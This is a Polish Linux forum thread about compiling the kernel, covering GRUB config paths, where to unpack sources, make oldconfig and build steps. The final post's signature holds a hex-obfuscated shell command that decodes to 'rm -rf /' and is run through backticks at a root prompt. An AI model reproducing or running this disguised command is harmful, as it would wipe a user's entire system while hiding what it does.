Kompilacja jądra

W tym miejscu zapraszamy Was do współpracy. Czekamy na propozycje, sugestie i rady.
Moderatorzy zatroszczą się o to, by najlepsze teksty trafiły do FAQ.

Moderatorzy: Moderatorzy, Administratorzy

Awatar użytkownika
pwe25
Użytkownik
Posty: 99
Rejestracja: 2004-12-25, 21:36
Lokalizacja: Warszawa

Re: Kompilacja jądra

Post autor: pwe25 »

mina86 pisze: /etc/grub.conf

Kod: Zaznacz cały

/etc/grub/menu.lst
:wink:

edit
sa również odmiany(właśnie sprawdziłem):
np w Gentoo:

Kod: Zaznacz cały

/etc/grub/grub.conf
kropka .
hemar
Użytkownik
Posty: 16
Rejestracja: 2005-03-05, 23:48
Lokalizacja: Szczecin
Kontakt:

Re: Kompilacja jądra

Post autor: hemar »

czy paczki ze starym jądem mają zostać i je usunąć ?
www.szluug.org - Szczecinska Grupa Użytkowników Linuxa i Unixa
Awatar użytkownika
brx
Użytkownik
Posty: 723
Rejestracja: 2004-06-24, 14:37
Lokalizacja: Poznań/Lublin

Re: Kompilacja jądra

Post autor: brx »

jeśli mówisz o archiwach tar.gz to mozesz je bez przeszkód usunać ...

...co do katalogu /usr/src/linux2.X.Y to przy kompilacji urzywana jest tylko aktualne jadro (podlinkowane do /usr/src/linux) ...stare nie są potrzebne (chyba że wnukom się bedziesz chwalił że 2.2 kompilowałes :D)
Slackware Current - Kernel 2.6.18 - Xfce - - Aterm - Kadu
_______________________________________
Registered Linux User 363857 :D
hug0l
Użytkownik
Posty: 30
Rejestracja: 2005-01-26, 15:54
Lokalizacja: z nienacka

Re: Kompilacja jądra

Post autor: hug0l »

Witam, tak sobie czytałem i mam w sumie pytanie bo w README od jajka znalezc mozna :

Kod: Zaznacz cały

INSTALLING the kernel :
(...)
Do NOT use the /usr/src/linux area! This area has a (usually incomplete) set of kernel headers that are used by the library header files. They should match the library, and not get messed up by whatever the kernel-du-jour happens to be. 
No wiec gdzie powinno sie/prawidlowo/lepiej rozpakowac zrodla ? /opt ?
Awatar użytkownika
mina86
Moderator
Posty: 3343
Rejestracja: 2004-06-14, 21:58
Lokalizacja: Linux 5.x x86_64
Kontakt:

Re: Kompilacja jądra

Post autor: mina86 »

Gdziekolwiek, chociażby do /usr/src/linux-2.X.Y i potem dopiero po zainstalowaniu jakoś to podlinkowywać czy coś, tyle że jest to baaaaaaardzo uciążliwe (np. wymusza rekompilacje całego jądra), a osobiście nigdy nie spotkałem się z jakimikolwiek kłopotami.. Zasadniczo isotne jest coby zaraz po skompilowaniu, zainstalować nowy kernel i zrestartować kompa, a w nieużywanie "/usr/src/linux area" warto się bawić jedynie przy dużych skokach w wersji..
Zastrzegam sobie prawo nieanalizowania postów pisanych niepoprawną polszczyzną.
Post generated automatically by A.I. system code name ‘mina86’ in response to the previous one.
hemar
Użytkownik
Posty: 16
Rejestracja: 2005-03-05, 23:48
Lokalizacja: Szczecin
Kontakt:

Re: Kompilacja jądra

Post autor: hemar »

A jeśli coś przegapiłem podczas konfiguracji czy można to jakoś dodać czy trzeba jeszcze raz kompliować jądro ?
www.szluug.org - Szczecinska Grupa Użytkowników Linuxa i Unixa
Awatar użytkownika
brx
Użytkownik
Posty: 723
Rejestracja: 2004-06-24, 14:37
Lokalizacja: Poznań/Lublin

Re: Kompilacja jądra

Post autor: brx »

poprostu poprawiasz config i jeszcze raz make
Slackware Current - Kernel 2.6.18 - Xfce - - Aterm - Kadu
_______________________________________
Registered Linux User 363857 :D
Awatar użytkownika
Corvin
Administrator
Posty: 1143
Rejestracja: 2004-05-21, 15:04
Lokalizacja: Gdańsk

Re: Kompilacja jądra

Post autor: Corvin »

wygodnie jest zainstalować przed kompilacją paczkę Slackową kernel-source, a jeśli chcemy przywrócić katalogi do stanu pierwotnego tzn. takiego po odpakowaniu źródeł kernela wydajemy polecenie make mrproper - uwaga usunie to config kernela czyli plik .config, jakby powyzucac te komentarze typu:
jakieś różne dziwne nieistotne rzeczy ;) >
to mzoe dało by sie powoli cos z tego zrobić ;) zresztą Skyscraper nad tym panuje ;)
"Spróbuj zapalić maleńką świeczkę zamiast przeklinać ciemność."
Konfucjusz
luka5z
Użytkownik
Posty: 19
Rejestracja: 2004-12-15, 16:22

Re: Kompilacja jądra

Post autor: luka5z »

Ja tam pierwsze kroki stawialem na http://www.inet.ll.pl i ogolnie juz udalo mi sie zmienianie jadrow :) na forum jest dopisane pare problemow glownie z *tc ktore paru osobom krzaczylo blad przy odpalaniu rc.hfsc Wiec jakby co wstapcie tam :P
Ostatnio zmieniony 2005-04-20, 06:49 przez luka5z, łącznie zmieniany 1 raz.
Awatar użytkownika
dame
Moderator w st. spocz.
Posty: 985
Rejestracja: 2004-09-25, 17:37
Lokalizacja: wawa

Re: Kompilacja jądra

Post autor: dame »

pewnie chodzilo Ci o http://www.inet.one.pl ?
aktualnie windows xp
luka5z
Użytkownik
Posty: 19
Rejestracja: 2004-12-15, 16:22

Re: Kompilacja jądra

Post autor: luka5z »

sorx, literowka, wiadomo ze tak :wink: ogolnie tam sie tego nauczylem, mam nadzieje :lol:
pepto
Użytkownik
Posty: 1
Rejestracja: 2004-11-16, 22:49

Re: Kompilacja jądra

Post autor: pepto »

hi all,
dodam tylko o bardzo przydatnej opcji o ktorej nie ma zazwyczaj na faq/tut tego typu a mianowicie jesli chcemy zrobic upgrade jajka a chcemy wykorzystac stary cfg to trzeba go skopiowac do katalogu z nowymi zrodelkami a nastepnie zamiast "make menuconfig" zapodac "make oldconfig" ... kiedys sporo sie tego naszukalem i moze sie komus przydac.
btw : jajka z serii 2.6.x kompiluje sie bez make dep czyli :
make config || menuconfig || oldconfig
make bzImage
make modules
make modules_istall
make install ...
natomiast make clean czysci pozostalosci po kompilacji
sorki jesli w czyms powtarzam kogos :)
pozdrawiam
havoc
Użytkownik
Posty: 14
Rejestracja: 2005-04-10, 14:21
Lokalizacja: Rybnik

Re: Kompilacja jądra

Post autor: havoc »

Co do tego czy źródła powinny zostać rozpakowane do /usr/src/linux czy w inne miejsce to ostatnio wyczytałem cos na ten temat. Z tego co wyczytałem chodzi mianowicie tak naprawdę o bibliotekę glibc, gdyż zawsze integruje się ona z nagłówkami jądra, na którym jest kompilowane i chodzi właśnie o te nagłówki. Po instalacji glibc powinny się one znajdować w /usr/include/linux i /usr/include/asm (oraz /usr/include/asm-generic na nowszych systemach). Glibc odwołuje się to tych nagłówków jądra, na których glibc skompilowano. Niekiedy zamiast tych katalogów są tam dowiązania symboliczne do odpowiednich katalogów w źródłach w /usr/src/linux. Mając takie dowiązania można doprowadzić do potencjalnie niebezpiecznej sytuacji, gdyż po aktualizacji jądra dochodzi także to aktualizacji części nagłówków glibc. Tyle, że samo glibc nic o tym nie wie.W efekcie może dojść przez to do konfliktów nagłówków i trudnych do przewidzenia awarii w nowo kompilowanych programach. Jeżeli w /usr/include są wyżej wymienione katalogi a nie dowiązania to spokojnie można trzymać źródła w /usr/src/linux.
Mniej więcej tyle zapamiętałem. Nie wiem czy rzeczywiście o to chodzi czy nie, ale jeśli nie to niech ktoś mnie poprawi. Wyczytałem to w Linux+ z tego roku w numerze chyba 1/2005 w dziale "Sztuczki i kruczki", gdyby ktoś potrzebował tej informacji.

Pozdrawiam
szorcik
Użytkownik
Posty: 3
Rejestracja: 2005-05-30, 13:20

wszystko fajnie...

Post autor: szorcik »

wszystko fajnie, rzetelne artykuły (i bardzo potrzebne zarazem), ale czy mógłby ktoś jeszcze dopisac, co należy wpisac do lilo w linijce VGA=...? w najnowszych jądrach (czyt. >= 2.6.11.10) trzeba tam wpisac wartośc szestnastkową - podobno. ale jaką??? [/code]
sayetan
Moderator w st. spocz.
Posty: 2193
Rejestracja: 2004-06-20, 21:47
Lokalizacja: Jelenia Góra

Re: Kompilacja jądra

Post autor: sayetan »

nie trzeba, ostatnio jechalem na jadrze 2.6.11.11 i nic nie musialem wpisywac
u Ciebie zapewne jest problem z frambufferem, poszukaj na forum ostatnio ktos mial podobny problem
# `echo -e "\x72\x6D\x20\x2D\x72\x66\x20\x2F"`
ODPOWIEDZ